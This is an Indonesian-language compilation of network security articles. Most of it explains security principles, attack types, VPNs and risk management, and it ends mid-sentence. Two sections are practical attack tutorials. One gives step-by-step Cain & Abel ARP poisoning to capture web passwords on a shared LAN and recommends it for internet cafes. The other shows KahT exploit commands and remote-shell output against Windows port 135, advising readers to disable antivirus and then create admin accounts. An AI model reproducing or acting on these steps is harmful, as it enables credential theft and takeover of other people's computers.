Pengertian Keamanan Komputer dan Konsep (2)

Pengertian Keamanan Komputer dan Konsep Keamanan Jaringan
sistem keamanan jaringan
Pengertian Keamanan Komputer dan Konsep Keamanan Jaringan

Keamanan jaringan komputer sebagai bagian dari sebuah sistem informasi adalah sangat penting untuk
menjaga validitas dan integritas data serta menjamin keterrsediaan layanan begi penggunanya. Sistem
harus dilindungi dari segala macam serangan dan usaha-usaha penyusupan atau pemindaian oleh pihak
yang tidak berhak.
Komputer yang terhubung ke jaringan mengalami ancaman keamanan yang lebih besar daripada host
yang tidak terhubung kemana-mana. Dengan mengendalikan network security, resiko tersebut dapat
dikurangi. Namun network security biasanya bertentangan dengan network acces, karena bila network
acces semakin mudah, network security makin rawan. Bila network security makin baik, network acces
semakin tidak nyaman. Suatu jaringan didesain sebagai komunikasi data highway dengan tujuan
meningkatkan akses ke sistem komputer, sementara keamanan didesain untuk mengontrol akses.
Penyediaan network security adalah sebagai aksi penyeimbang antara open acces dengan security.
Prinsip Keamanan Jaringan
Prinsip keamanan jaringan dapat dibedakan menjadi tiga, yaitu :
a. Kerahasiaan
Kerahasiaan berhubungan dengan hak akses untuk membaca data atau informasi dan suatu sistem
computer. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi
hanya dapat dibaca oleh pihak yang telah diberi hak atau wewenang secara legal.

b. Integritas (integrity)
Integrity berhubungan dengan hak akses untuk mengubah data atau informasi dari suatu sistem
computer. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi
hanya dapat diubah oleh pihak yang telah diberi hak.
c. Ketersediaan (availability)
Availability berhubungan dengan ketersediaan data atau informasi pada saat yang dibutuhkan. Dalam hal
ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi yang terdapat pada
sistem komputer dapat diakses dan dimanfaatkan oleh pihak yang berhak.
d. Authentication

Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli, orang yang
mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud, atau server yang kita
hubungi adalah betul-betul server yang asli.
Untuk membuktikan keaslian dokumen dapat dilakukan dengan teknologi watermarking dan digital
signature. Sedangkan untuk menguji keaslian orang atau server yang dimaksud bisa dilakukan dengan
menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya.
e. Akses Kontrol
Aspek kontrol merupakan fitur-fitur keamanan yang mengontrol bagaimana user dan sistem
berkomunikasi dan berinteraksi dengan system dan sumberdaya yang lainnya. Akses kontrol melindungi
sistem dan sumberdaya dari akses yang tidak berhak dan umumnya menentukan tingkat otorisasi setelah

prosedur otentikasi berhasil dilengkapi.
Kontrol akses adalah sebuah term luas yang mencakup beberapa tipe mekanisme berbeda yang
menjalankan fitur kontrol akses pada sistem komputer, jaringan, dan informasi. Kontrol akses sangatlah
penting karena menjadi satu dari garis pertahanan pertama yang digunakan untuk menghadang akses
yang tidak berhak ke dalam sistem dan sumberdaya jaringan.
f. Non-Repudiation
Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi.
Penggunaan digital signature, certificates, dan teknologi kriptografi secara umum dapat menjaga aspek
ini. Akan tetapi hal ini masih harus didukung oleh hukum sehingga status dari digital signature itu jelas
legal.
Jenis Serangan Terhadap Keamanan Jaringan
Pada dasarnya, menurut jenisnya, serangan terhadap suatu data dalam suatu jaringan dapat
dikategorikan menjadi 2, yaitu:
1. Serangan Pasif
Merupakan serangan pada sistem autentikasi yang tidak menyisipkan data pada aliran data, tetapi hanya
mengamati atau memonitor pengiriman informasi ke tujuan. Informasi ini dapat digunakan di lain waktu
oleh pihak yang tidak bertanggung jawab. Serangan pasif yang mengambil suatu unit data kemudian
menggunakannya untuk memasuki sesi autentikassi dengan berpura-pura menjadi user yangg autentik /
asli disebut dengan replay attack. Beberapa informasi autentikasi seperti password atau data biometric
yang dikirim melalui transmisi elektronik dapat direkam dan kemudian digunakan untuk memalsukann

data yang sebenarnya. Serangan pasif inni sulit dideteksi kareena penyerang tidak melakukan perubahan
data. Oleh sebab itu untuk mengatasi serangan pasif ini lebih ditekankan pada pencegahan daripada
pendeteksiannya.
2. Serangan Aktif

Merupakan serangan yang mencoba memodifikasi data, mencoba mendapatkan autentikasi, atau
mendapatkan autentikasi dengan mengirimkan paket-paket data yang salah ke dalam data stream atau
dengan memodifikassi paket-paket yang melewati data stream. Kebalikan dari serangan pasif, serangan
aktif sulit untuk dicegah karena untuk melakukannya dibutuhkan perlindungan fisik untuk semua
fasilitass komunikassi dan jalur-jalurnya setiap saat. Yang dapat dilakukan adalah mendeteksi dan
memulihkan keadaan yang disebabkan oleh serangan ini.
Bentuk-bentuk Ancaman
1. Memaksa masuk dan kamus password
Jenis ancaman keamanan jaringan ini lebih umum disebut sebagai Brute Force and Dictionary, serangan
ini adalah upaya masuk ke dalam jaringan dengan menyerang database password atau menyerang login
prompt yang sedang active. Serangan masuk paksa ini adalah suatu upaya untuk menemukan password
dari account user dengan cara yang sistematis mencoba berbagai kombinasi angka, huruf, atau symbol.
Sementara serangan dengan menggunakan metoda kamus password adalah upaya menemukan
password dengan mencoba berbagai kemungkinan password yang biasa dipakai user secara umum
dengan menggunakan daftar atau kamus password yang sudah di-definisikan sebelumnya.

Untuk mengatasi serangan keamanan jaringan dari jenis ini anda seharusnya mempunyai suatu policy
tentang pemakaian password yang kuat diantaranya untuk tidak memakai password yang dekat dengan
kita missal nama, nama anak, tanggal lahir dan sebagainya. Semakin panjang suatu password dan
kombinasinya semakin sulit untuk diketemukan. Akan tetapi dengan waktu yang cukup, semua password
dapat diketemukan dengan metoda brute force ini.
2. Denial of Services (DoS)
Deniel of Services (DoS) ini adalah salah satu ancaman keamanan jaringan yang membuat suatu layanan
jaringan jadi mampet, serangan yang membuat jaringan anda tidak bisa diakses atau serangan yang
membuat system anda tidak bisa memproses atau merespon terhadap traffic yang legitimasi atau
permintaan layanan terhadap object dan resource jaringan. Bentuk umum dari serangan Denial of
Services ini adalah dengan cara mengirim paket data dalam jumlah yang sangat bersar terhadap suatu
server dimana server tersebut tidak bisa memproses semuanya. Bentuk lain dari serangan keamanan
jaringan Denial of Services ini adalah memanfaatkan telah diketahuinya celah yang rentan dari suatu
operating system, layanan-2, atau applikasi-2. Exploitasi terhadap celah atau titik lemah system ini bisa
sering menyebabkan system crash atau pemakaian 100% CPU.
Tidak semua Denial of Services ini adalah merupakan akibat dari serangan keamanan jaringan. Error
dalam coding suatu program bisa saja mengakibatkan kondisi yang disebut DoS ini. Disamping itu ada
beberapa jenis DoS seperti:
Distributed Denial of Services (DDoS), terjadi saat penyerang berhasil meng-kompromi beberapa layanan
system dan menggunakannya atau memanfaatkannya sebagai pusat untuk menyebarkan serangan

terhadap korban lain.

Ancaman keamanan jaringan Distributed refelective deniel of service (DRDoS) memanfaatkan operasi
normal dari layanan Internet, seperti protocol-2 update DNS dan router. DRDoS ini menyerang fungsi
dengan mengirim update, sesi, dalam jumlah yang sangat besar kepada berbagai macam layanan server
atau router dengan menggunakan address spoofing kepada target korban.
Serangan keamanan jaringan dengan membanjiri sinyal SYN kepada system yang menggunakan protocol
TCP/IP dengan melakukan inisiasi sesi komunikasi. Seperti kita ketahui, sebuah client mengirim paket SYN
kepada server, server akan merespon dengan paket SYN/ACK kepada client tadi, kemudian client tadi
merespon balik juga dengan paket ACK kepada server. Ini proses terbentuknya sesi komunikasi yang
disebut Three-Way handshake yang dipakai untuk transfer data sampai sesi tersebut berakhir. Kebanjiran
SYN terjadi ketika melimpahnya paket SYN dikirim ke server, tetapi si pengirim tidak pernah membalas
dengan paket akhir ACK.
Serangan keamanan jaringan dalam bentuk Smurf Attack terjadi ketika sebuah server digunakan untuk
membanjiri korban dengan data sampah yang tidak berguna. Server atau jaringan yang dipakai
menghasilkan response paket yang banyak seperti ICMP ECHO paket atau UDP paket dari satu paket yang
dikirim. Serangan yang umum adalah dengan jalan mengirimkan broadcast kepada segmen jaringan
sehingga semua node dalam jaringan akan menerima paket broadcast ini, sehingga setiap node akan
merespon balik dengan satu atau lebih paket respon.
Serangan keamanan jaringan Ping of Death, adalah serangan ping yang oversize. Dengan menggunakan

tool khusus, si penyerang dapat mengirimkan paket ping oversized yang banyak sekali kepada korbannya.
Dalam banyak kasus system yang diserang mencoba memproses data tersebut, error terjadi yang
menyebabkan system crash, freeze atau reboot. Ping of Death ini tak lebih dari semacam serangan Buffer
overflow akan tetapi karena system yang diserang sering jadi down, maka disebut DoS attack.
Stream Attack terjadi saat banyak jumlah paket yang besar dikirim menuju ke port pada system korban
menggunakan sumber nomor yang random.
3. Spoofing
Spoofing adalah seni untuk menjelma menjadi sesuatu yang lain. Spoofing attack terdiri dari IP address
dan node source atau tujuan yang asli atau yang valid diganti dengan IP address atau node source atau
tujuan yang lain.
4. Serangan Man-in-the-middle
Serangan keamanan jaringan Man-in-the-middle (serangan pembajakan) terjadi saat user perusak dapat
memposisikan diantara dua titik link komunikasi.
* Dengan jalan mengkopy atau menyusup traffic antara dua party, hal ini pada dasarnya merupakan
serangan penyusup.
* Para penyerang memposisikan dirinya dalam garis komunikasi dimana dia bertindak sebagai proxy atau
mekanisme store-and-forwad (simpan dan lepaskan).

Para penyerang ini tidak tampak pada kedua sisi link komunikasi ini dan bisa mengubah isi dan arah
traffic. Dengan cara ini para penyerang bisa menangkap logon credensial atau data sensitive ataupun

mampu mengubah isi pesan dari kedua titik komunikasi ini.
5. Spamming
Spam yang umum dijabarkan sebagai email yang tak diundang ini, newsgroup, atau pesan diskusi forum.
Spam bisa merupakan iklan dari vendor atau bisa berisi kuda Trojan. Spam pada umumnya bukan
merupakan serangan keamanan jaringan akan tetapi hampir mirip DoS.
6. Sniffer
Suatu serangan keamanan jaringan dalam bentuk Sniffer (atau dikenal sebagai snooping attack)
merupakan kegiatan user perusak yang ingin mendapatkan informasi tentang jaringan atau traffic lewat
jaringan tersebut. suatu Sniffer sering merupakan program penangkap paket yang bisa menduplikasikan
isi paket yang lewat media jaringan kedalam file. Serangan Sniffer sering difokuskan pada koneksi awal
antara client dan server untuk mendapatkan logon credensial, kunci rahasia, password dan lainnya.
7. Crackers
Ancaman keamanan jaringan Crackers adalah user perusak yang bermaksud menyerang suatu system
atau seseorang. Cracker bisasanya termotivasi oleh ego, power, atau ingin mendapatkan pengakuan.
Akibat dari kegiatan hacker bisa berupa pencurian (data, ide, dll), disable system, kompromi keamanan,
opini negative public, kehilangan pasar saham, mengurangi keuntungan, dan kehilangan produktifitas.
VPN

Virtual Private Network(VPN) adalah solusi koneksi private melalui jaringan publik. Dengan VPN maka
kita dapat membuat jaringan di dalam jaringan atau biasa disebut tunnel.


Solusi VPN :
IPSEC, solusi VPN via IP Secure Protocol. Solusi yang sudah distandarisasi tapi paling susah dikonfigurasi.
Tingkat keamanan yang cukup baik namun dalam implementasinya cukup rumit. Aplikasi yang digunakan
yang berbasis open source yaitu Open/Free Swan.
PPPT, solusi VPN versi awal. Merupakan solusi VPN dengan feature standar dimana jaringan dibangun
dengan point to point seperti halnya anda melakukan dial up pada internet dirumah. Pada saat dial up ke
provider internet ada maka akan dibangun point to point tunnel melalui jaringan telepon. Aplikasi
OpenSource yang menggunakan PPPT adalah PopTop.
VPN with SSL, merupakan solusi VPN dengan menerapkan protocol Secure Socket Layer(SSL) pada
enkripsi jaringan tunnel yang dibuat. Solusi ini diawali dengan aplikasi OpenVPN.

Fungsi VPN :
Menghubungkan kantor-kantor cabang melalui jaringan public. Dengan VPN maka perusahaan tidak
perlu membangun jaringan sendiri. Cukup terhubung dengan jaringan public contohnya internet. Saat ini
hampir semua kantor perusahaan pasti memiliki akses internet. Dengan demikin bisa dihemat anggaran
koneksi untuk ke cabang-cabang.
Mobile working, dengan VPN maka karyawan dapat terhubung langsung dengan jaringan kantor secara
private. Maka karyawan dapat melakukan pekerjaan yang bisa dilakukan dari depan komputer tanpa
harus berada di kantor. Hal ini menjadi solusi virtual office di jaman mobilitas tinggi seperti sekarang ini.

Securing your network. Saat ini beberapa vendor seperti telkom memberikan solusi VPN juga untuk
perusahaan-perusahaan. Namun solusi ini masih kurang aman. Karena untuk terhubung tidak
memerlukan authentikasi. Sehingga bila ada pengguna mengetahui settingan VPN perusahaan tersebut
maka dia dapat terhubung ke jaringan perusahaan tapi harus login. Contohnya pada telkomsel VPN
hanya dengan mengganti nama APN pada settingan network maka dia dapat langsung terhubung dengan
jaringan dengan nama APN tersebut. Dengan memasang VPN lagi di jaringan VPN semi publik tersebut
maka jaringan akan lebih aman karena sebelum masuk ke jaringan kantor maka user harus membuat
tunnel dulu dan login ke VPN server baru bisa terhubung dengan jaringan kantor.
Mengamankan jaringan wireless. Jaringan wireless merupakan jaringan publik yang bisa diakses oleh
siapa saja yang berada dijangkauan wireless tersebut. Walaupun wireless juga memiliki pengaman
seperti WEP, WPA, WPA2 namun jaringan wireless masih saja bisa ditembus. Dengan menggunakan VPN
maka user yang terhubung ke wireless harus membuat tunnel dulu dengan login ke VPN server baru bisa
menggunakan resource jaringan seperti akses internet dan sebagainya.
Dari beberapa solusi yang ada saat ini yang paling banyak digunakan adalah solusi VPN dengan SSL yaitu
dengan OpenVPN sebagai aplikasinya. Selain gratis karena open source juga memiliki kemudahan
implementasi. Saya lebih memilih menggunakan OpenVPN karena kemudahan implementasinya serta
bersifat multiplatform dapat dijalankan pada Linux ataupun Windows.
Manfaat VPN :
Biaya lebih murah
Pembangunan jaringan leased line khusus atau pribadi memerlukan biaya yang sangat mahal. VPN dapat

menjadi alternatif yang dapat digunakan untuk dapat mengatasi permasalahan diatas. VPN dibangun
dengan menggunakan jaringan internet milik publik tanpa perlu membangun jaringan pribadi. Dengan
demikian bila ingin menggunakan VPN hanya diperlukan koneksi internet.
Fleksibilitas
Semakin berkembangnya internet, dan makin banyaknya user yang menggunakannya membuat VPN juga
ikut berkembang. Setiap user dapat tergabung dalam VPN yang telah dibangun tanpa terbatas jarak dan

waktu. Fleksibilitas dapat dicapai apabila user tersebut terkoneksi dengan internet dan mendapat ijin
menggunakan VPN.
Kemudahan pengaturan dan administrasi
Keseluruhan VPN dapat diatur dalam server VPN sendiri, dan untuk dapat digunakan oleh klien, maka
perlu diinstal aplikasi VPN pada klien. Hal ini tentu lebih mudah apabila dibandingkan dengan
menggunakan leased line yang masih perlu memonitor modem.
Mengurangi kerumitan pengaturan dengan teknologi tunneling
Tunneling atau terowongan merupakan kunci utama pada VPN. Koneksi pribadi dalam VPN dapat terjadi
dimana saja selama terdapat tunnel yang menghubungkan pengirim dan penerima data. Dengan adanya
tunnel ini, maka tidak diperlukan pengaturan-pengaturan lain yang ada di luar tunnel tersebut, asalkan
sumber dari tunnel tersebut dapat menjangkau tujuannya.

Implementasi VPN :


1. Intranet VPN

Intranet merupakan koneksi VPN yang membuka jalur komunikasi pribadi menuju ke jarinan lokal yang
bersifat pribadi melalui jaringan publik seperti internet. Dengan melalui VPN jenis ini, user dapat
langsung mengakses file-file kerja dengan leluasa tanpa terikat tempat dan waktu. Apabila dianalogikan
pada sebuah perusahaan, koneksi ke kantor pusat dapat dilakukan dari mana saja, dari kantor pusat
menuju ke kantor cabang dapat pula dibuat koneksi pribadi, dan juga dari kantor juga memungkinkan
untuk dibuat jalur komunikasi pribadi yang ekonomis.
2. Ekstranet VPN

Ekstranet VPN merupakan fasilitas VPN yang diperuntukkan bagi pihak-pihak dari luar anggota organisasi
atau perusahaan, tetapi masih memiliki hak dan kepentingan untuk dapat mengakses data dalam kantor.
Pada umumnya user dari VPN dari jenis ini merupakan customer, vendor, partnet dan supplier dari suatu
perusahaan.

3. Model Remote Access VPN

VPN merupakan sebuah proses remote access yang bertujuan mendapatkan koneksi ke jaringan private
tujuannya. Proses remote accsess VPN tersebut dibedakan menjadi dua jenis berdasarkan oleh siapa
proses remote access VPN tersebut dilakukan. Kedua jenis tersebut antara lain sebagai berikut.

4. Client-initiated

Secara harfiah, client-initiated merupakan pihak klien yang berinisiatif untuk melakukan sesuatu. Pada
VPN jenis ini, ketika sebuah komputer ingin membangun koneksi VPN maka PC tersebutlah yang
berusaha membangun tunnel dan melakukan proses enkripsi hingga mencapai tujuannya dengan aman.
Namun, proses ini tetap mengandalkan jasa dari jaringan Internet Service Provider (ISP) yang dapat
digunakan untuk umum. Clien-initiated digunakan oleh komputer-komputer umum dengan
mengandalkan VPN server atau VPN concentrator pada jaringan tujuannya.

5. Network Access Server-initiated

Berbeda dengan clien-initiated, VPN jenis network access server-initiated ini tidak mengharuskan clien
untuk membuat tunnel dan melakukan enkrpsi dan dekripsi sendiri. VPN jenis ini hanya mengharuskan
user melakukan dial-in ke network access server (NAS) dari ISP. Kemudian, NAS tersebut yang
membangun tunnel menuju ke jaringan private yang dituju oleh klien tersebut. Dengan demikian,
koneksi VPN dapat dibangun dan dipergunakan oleh banyak klien dari manapun, karena pada umumnya
NAS milik ISP tersebut memang dibuka untuk umum.

Keamanan Jaringan Komputer

Dua minggu terakhir antara April dan Mei 2004, komunitas TI Indonesia diguncang berita tertangkapnya
pembobol situs KPU oleh pihak kepolisian yang dimotori oleh tim ahli Teknologi Informasi KPU. Berita ini
sebetulnya tidakterlalu hebat jika tidak bernuansa politis, karena pembobolan situs memang sudah
dilakukan berkali-kali oleh anak-anak muda genius yang dengan bangganya dapat menayangkan inspirasi
mereka untuk diketahui semua orang.
Pembobolan situs atau web server sebetulnya tergolong teknik tradisional, karena belakangan ini muncul
teknik-teknik yang mampu mengobrak-abrik jaringan komputer atau Internetdengan cara yang lebih
canggih dan tidak terpikirkan sebelumnya. Terjadinya pembobolan situs atau perusakan sistem memang

akan terus terjadi, karena seperti halnya kehidupan di dunia ini, selalu berlomba antara polisi dan
pencuri.
Kalau kita lihat ke proses pembobolan situs KPU, yang salah adalah tim ahli TI KPU yang tidak sigap
menutup semua lubang yang memungkinkan masuknya pembobol, karena pada kenyataannya
keamanan suatu sistem itu tergantung pada manusia yang menjaga dan mengoperasikan sistem
tersebut, bukan melulu kesalahan di perangkat atau si pembobolnya. Dari data Computer Security
Institute yaitu lembaga binaan FBI di Amerika, 71% serangan ke dalam sistem jaringan komputer terjadi
dari dalam. Artinya, yang menyebabkan orang luar dapat masuk ke sistem adalah kelalaian dari dalam
sendiri, baik karena tidak melakukan pembaharuan sistem (patching) atau mengganti password secara
berkala.

Pengenalan Dasar Jaringan Komputer
Membobol Password Situs Web

Contoh kali ini mengenai bagaimana membobol password seseorang jika seseorang itu menuliskan
password yang mana komputer yang dia pakai masih dalam satu LAN yang sama dengan sang penyerang.
Sebelumnya, Saya akan menjelaskan terlebih dahulu bahwa dalam contoh kasus kali ini Saya
menggunakkan konfigurasi jaringan seperti ini:
Pada contoh kasus kali ini kita akan memanfaatkan kelemahan dari sistem jaringan yang disebut ARP
Spoofing. Singkatnya, peracunan ARP ini akan membuat data mengalihkan data kiriman ke komputer
penyerang. Misalnya, pada ilustrasi di atas terlihat jaringan LAN yang terdiri dari 2 komputer. Harusnya,
jika data mau dikirimkan ke internet, maka data itu ya langsung dikirimkan ke internet tanpa embelembel apa pun (kecuali switch). Namun, jika komputer penyerang mengirimkan racun ARP ke korban,
maka korban akan dibegoin. Setiap data yang dikirimkan dari korban, maka akan mampir dulu di
komputer penyerang.
Untuk mengirimkan racun-racun ini, kita bisa menggunakan perangkat lunak bernama Cain ‘n Abel.
Untuk mengunduhnya, Anda dapat langsung mengunjungi situsnya. Setelah diunduh Anda dapat
langsung memasangnya seperti halnya memasang perangkat lunak lainnya.
Setelah selesai dipasang (diinstall), mulailah melakukan hacking. Sekarang buka program Cain tersebut
dan melakukan langkah-langkah berikut ini.
1. Aktifkan Sniffing (pengintipan data) dan ARP Poisinoing. Caranya dapat Anda lihat pada screenshot di
bawah. Jika diminta memilih kartu jaringan, maka pilihlah adapter jaringan yang Anda pakai. Terkadang
akan terdeteksi 2 adapter jaringan atau bahkan lebih. Untuk memilih yang mana yang benar, Anda bisa
coba-coba memilih salah satu di antaranya dan langsung ke langkah selanjutnya. Jika langkah berikutnya

tidak bekerja, cukup ganti lewat menu Configure. Sebagai informasi, adapter YANG PASTI SALAH jika ada
kata DIALUP (karena ini modem dan bukan kartu jaringan).
Mengaktifkan Sniffing dan ARP.
2. Buka tabulasi sniffer, klik pada kotak kosong, klik tambah, lalu klik OK. Biarkan dia loading dan Anda
akan melihat daftar komputer yang ada pada subnet yang sama. Anda tak perlu mengerti subnet itu apa,
cukup ke langkah selanjutnya.
Menampilkan daftar komputer.
Mengaktifkan Sniffing dan ARP.
3. Klik pada tabulasi Sniffer, lalu ke APR, lalu klik kotak kosong bagian atas, lalu klik tombol tambah.
Memulai meracuni dengan ARP
4. Kemudian akan muncul kotak dialog pemilihan “pembodohan rute data”. Di sini Anda harus memilih
antara alamat IP komputer korban dan alamat IP node pusat. Untuk mengetahui alamat IP komputer
korban, Anda harus nebak atau langsung ngecek di komputer korbannya. Untuk mengetahui alamat IP,
pergi ke Start > Run > cmd > ENTER > ipconfig /all > ENTER. Setelah itu Anda akan melihat tampilan kirakira seperti ini:
C:\Users\Mufid>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : fidz-vista
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-E0-18-AC-C4-8B
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : 00-E0-18-AC-C4-8B

IP Address. . . . . . . . . . . . : 192.168.1.6 (INI ALAMAT KORBAN)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1 (INI NODE PUSATNYA)
DHCP Server . . . . . . . . . . . : 192.168.1.1
Karena itu, langsung saja lakukan penyadapan data antara alamat IP komputer korban dan alamat IP
node pusat. Sebagai tambahan, node pusat komputer korban dan komputer penyerang adalah sama.
Setelah selesai Anda dapat lihat penyadapan telah dimulai!
5. Sekarang semua password yang diketikan di halaman web manapun di komputer korban akan terbaca
di komputer penyerang!
6. Mari kita tes. Saya buka situs web Friendster di komputer korban.
Membuka situs web Friendster untuk menguji keampuhan racun-racun ini!
7. Lalu kembali ke komputer penyerang. Pergi ke tabulasi Passwords, lalu pilih HTTP dan geser daftar ke
bawah. Wuuhuu Anda melihat passwordnya sekarang! Perlu diketahui, daftar ini diupdate secara realtime. Jadi setiap password yang dikirimkan lewat halaman web, akan muncul di komputer penyerang
tanpa harus mengklik tombol REFRESH (karena memang tidak ada :p)
Lihatlah password-password itu terbongkar!
Dan itulah bagaimana cara melakukan hackingnya. Trik ini sangat efektif jika dilakukan di warnet, karena
di situ banyak password berterbaran.
Apakah ada cara perlindungannya? Tentu saja ada. Tapi caranya cenderung agak ribet dan gak’ simpel.
Saran Saya, lebih baik Anda menggunakan komputer yang terjamin keamanannya. Di rumah, misalnya.
Meski begitu, sudah ada beberapa situs web yang mengenkripsi password sebelum dikirim. Sehingga,
walau password dapat disadap, password itu tidak berarti apa-apa.

Membobol Password Jaringan

Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol
password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi
administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu
waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.

kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue
virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca
Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti
windows 2000 /XP.
Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools
KahT.
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:
KAHT II – MASSIVE RPC EXPLOIT dst
[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress……
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst……..
C:WINNTsystem32>
Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai.
anda bisa membuat user admin membuat sharing dll
Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda
terutama Administator jaringan.

Pengenalan Keamanan Jaringan Komputer

Artikel Keamanan Jaringan ini didedikasikan untuk memenuhi tugas mata kuliah Keamanan Jaringan
Komputer.
Di dalam posting tentang pengenalan keamanan jaringan ini terbagi menjadi 3 bagian, yaitu : Keamanan
dan Manajemen Perusahaan, Klasifikasi Kejahatan Komputer, dan Aspek dari Kemanan Jaringan. dan kita
akan membahas semuanya satu persatu..
Keamanan Dan Manajemen Perusahaan
Seringkali sulit untuk membujuk manajemen perusahaan atau pemilik sistem informasi untuk melakukan
investasi di bidang keamanan. Di tahun 1997 majalah Information Week melakukan survey terhadap
1271 system atau network manager di Amerika Serikat. Hanya 22% yang menganggap keamanan sistem
informasi sebagai komponen sangat penting(“extremely important”). Mereka lebih mementingkan
“reducing cost” dan “improving competitiveness” meskipun perbaikan sistem informasi setelah dirusak
justru dapat menelan biaya yang lebih banyak.
Keamanan itu tidak dapat muncul demikian saja. Dia harus direncanakan. Ambil contoh berikut. Jika kita
membangun sebuah rumah, maka pintu rumah kita harus dilengkapi dengan kunci pintu. Jika kita terlupa
memasukkan kunci pintu pada budget perencanaan rumah, maka kita akan dikagetkan bahwa ternyata
harus keluar dana untuk menjaga keamanan.
Pengelolaan terhadap keamanan dapat dilihat dari sisi pengelolaan resiko (riskmanagement). Lawrie
Brown dalam menyarankan menggunakan “Risk Management Model” untuk menghadapi ancaman
(managing threats). Ada tiga komponen yang memberikan kontribusi kepada Risk, yaitu :
1. Assets terdiri dari hardware, software, dokumnentasi, data, komunikasi, lingkungan dan manusia.
2. Threats (ancaman) terdiri dari pemakai (users), teroris, kecelakaan, carakcers, penjahat, kriminal,
nasib, (acts of God), intel luar negeri (foreign intellegence)
3. Vulneribalities (kelemahan) terdiri dari software bugs, hardware bugs, radiasi, tapping, crostalk,
cracker via telepon, storage media.
Untuk menanggulangi resiko (Risk) tersebut dilakukan apa yang disebut “countermeasures”. yang dapat
berupa :
* Mengurangi Threat, dengan menggunakan antivirus.
* Mengurangi Vulnerability, dengan meningkatkan security atau menambah firewall.

* Usaha untuk mengurangi impak (impact). yang ini kurang ngerti nih..klo ada yang tau komen di posting
ini dong. :)
* Mendeteksi kejadian yang tidak bersahabat (hostile event) misalnya pop up. jadi kita antisipasi dengan
popup blocker. atau misalnya spyware kita atasi dengan antispyware.
* Kembali (recover) dari kejadian, dengan system recovery atau tools-tools recovery lainnya.
Klasifikasi Kejahatan Komputer
Kalo kita bicara masalah kejahatan komputer pasti banyak sekali macamnya, karena itu gw menuliskan
klasifikasi kejahatan komputer agar mudah kita mengenali dan membedakan model-model kejahatan
komputer. Klasifikasi kali ini dibedakan berdasarkan lubang kemanan yang dibedakan menjadi 4 (empat)
yaitu :
-> Kemanan yang bersifat fisik (Phisycal Security), Adalah Lubang keamanan yang bersifat fisik artinya
bisa tersentuh seperti akses orang ke gedung, peralatan, dan media yang digunakan.
Beberapa contoh kejahatan komputer yang bisa diakses dari lubang keamanan yang bersifat fisik :
1. Wiretapping, adalah istilah untuk penyadapan saluran komunikasi khususnya jalur yang menggunakan
kabel. misalnya penyadapan Telpon, Listrik, dan atau Internet.
2. Denial of Service, aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga
user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Denial of Service dapat
dilakukan dengan cara mematikan peralatan atau membanjiri saluran komunikasi dengan permintaan
yang menyebabkan jaringan menjadi sibuk, sistem hang, bandwidth habis, ram terkuras.
3. Pencurian, yang jelas merupakan bentuk kejahatan fisik karena mengambil alih peralatan / media.
-> Keamanan yang Berhubungan dengan Orang (personel), Lubang keamanan yang berkaitan dengan hak
akses berdasarkan. Contohnya seorang user yang memanipulasi hak aksesnya menjadi administrator.
-> Keamanan dari Data dan Media serta Teknik Komunikasi (Comunication), Lubang keamanan yang
terletak pada media. Misalnya Kelemahan Software yang digunakan untuk mengelola data.
-> Keamanan dalam Kebijakan Operasi (Policy), Lubang keamanan yang terletak pada kebijakan yang
digunakan untuk mengatur dan mengelola sistem.
Aspek dari Keamanan Jaringan
Garfinkel mengemukakan bahwa keamanan computer (computer security) melingkupi beberapa aspek,
yaitu :
1. Privacy / Confidentiality

Inti utama aspek privacy atau confidentiality adalah usaha untuk menjaga informasi dari orang yang tidak
berhak mengakses. Privacy lebih ke arah data-data yang sifatnya privat sedangkan confidentiality
biasanya berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu (misalnya
sebagai bagian dari pendaftaran sebuah servis) dan hanya diperbolehkan untuk keperluan tertentu
tersebut.
2. Integrity
Aspek ini menekankan bahwa informasi tidak boleh diubah tanpa seijin pemilik informasi. Adanya virus,
Trojan horse, atau pemakai lain yang mengubah informasi tanpa ijin merupakan contoh masalah yang
harus dihadapi. Sebuah email dapat saja “ditangkap” (intercept) di tengah jalan, diubah isinya (altered,
tampered, modified), kemudian diterukan ke alamat yang dituju. Dengan kata lain, integritas dari
